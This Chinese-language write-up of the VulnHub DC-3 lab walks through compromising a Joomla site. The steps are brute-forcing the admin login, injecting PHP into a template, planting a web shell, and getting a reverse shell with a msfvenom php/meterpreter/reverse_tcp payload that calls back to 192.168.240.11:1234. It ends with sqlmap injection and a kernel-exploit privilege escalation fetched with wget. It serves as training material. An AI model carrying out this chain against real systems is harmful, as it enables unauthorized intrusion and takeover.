0%

DC3靶场复盘

vulnhub-DC3靶场复盘

端口扫描

|450
nmap扫描这个端口之后 可以得到一些更重要的信息 比如这个网站用的cms是joomla
用searchsploit可以发现有非常多的漏洞 百度之后发现有一个扫描器 joomscan

web探测

|450
web界面只有一个登录界面 可以尝试直接爆破 但是从结果来说 确实可以爆破 而且账户也存在
但是这里不是实际的管理界面

用joomscan可以找到真实的管理员登录界面 我们用password.lst 爆破可以得到密码
|475
|500
这个管理界面没有可以注入的点
|475
在模板中 可以看到php文件 我们可以在index.php中直接插入php代码 比如phpinfo() 到网站首页之后发现成功了
(这里如果要在index中插入必须要是用的和网站现在用的模板一样才可以 如果在html文件夹里面插入就不用管
然后上传php一句话木马 用蚁剑连接 拿到webshell
但是这里没有nc指令 我们要用到msfconsole
先输入msfconsole进入命令面板 use payload/php/meterpreter/reverse_tcp
|450
然后需要用msfvenom生成攻击文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.240.11 lport=1234 > a.php
接着回到msfconsole 用 use exploit/multi/handler 这是一个监听器 然后设置payload set payload php/meterpreter/reverse_tcp
show options 查看需要配置什么
set lhost 192.168.240.11 set lpost 1234 最后run就可以了
在web界面刷新刚才插入payload php代码的界面 就可以在msf中看到成功连接了
|500
输入shell 进入

2用joomla漏洞 (非爆破)

用searchsploit 搜索joomla + 版本号
这个脚本告诉我们了sqlmap使用的sqlmap

到columns这里要注意一点 这里用自动就什么都没有 而且因为这个表名有# 有用引号括起来
|500
同样可以得到这个密码

提权

可以做一些常规的操作比如suid 系统漏洞等 suid没有可以利用的 但是系统比较老 可以用内核提权
.linux系统漏洞提权
先在webshell里面用cat /etc/*releas 得到当前ubuntu系统的版本号 DISTRIB_RELEASE=16.04
uname -a 查看内核版本 Linux DC-3 4.4.0-21-generic
然后用searchsploit 找到漏洞利用脚本(必须同时满足系统和内核版本) 这里给的网址已经失效 需要我们去仓库 找到新的地方
把下载下来的文件用scp复制到kali 的/var/www/html中 然后在webshell用wget下载这个利用脚本
解压之后 运行脚本就可以提权了
|475